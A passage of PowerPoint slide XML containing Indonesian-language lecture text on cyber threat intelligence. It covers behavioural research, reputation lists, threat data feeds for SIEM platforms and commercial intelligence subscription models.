          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keluaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akademisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>naratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan TTP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP dan domain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TTP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>indikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikemas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SIEM). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CTI). Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukanlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditindaklanjuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikorelasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecerdasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (AI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SIEM. Platform dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>milik-penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data CTI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komersial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
